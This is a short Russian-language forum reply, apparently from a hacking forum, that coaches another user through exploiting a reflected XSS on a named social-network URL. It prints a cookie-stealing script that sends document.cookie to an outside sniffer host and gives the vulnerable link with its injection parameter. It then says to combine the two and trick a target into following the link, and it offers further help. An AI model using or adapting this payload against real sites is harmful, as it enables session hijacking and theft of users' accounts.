18.03.2007, 12:30
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
гыгы. ты терминологией не владеешь почти. тебе все дали уже.
Все теги идут текстом, потому что специально для таких как ты на сайтах ставят фильтры, которые не дают спионерить чужие данные.
Тебе дали пассивную XSS то есть теперь ты должен каким-либо образом заманить на нее нужного тебе пользователя.
то есть:
Код:
<script>img = new Image(); img.src = "http://site.ru/sniffer/s.gif?"+document.cookie;</script>
http://c5.one.lv/navigate.do?st.id=community.ownfriends.page&st.friends.fl.search=%22%3E%3Cscript%3Ealert%28"XSS"%29%3C%2Fscript%3E
тесно связаны. первое нужно подставить во второе и заставить юзера пройти по полученной ссылке или еще каким-либо образом.
Сниффер есть на античате. если хочешь, я могу помочь тебе с пассивкой, но следить за сесией и кукисами на сниффере тебе придется самому. |
|
|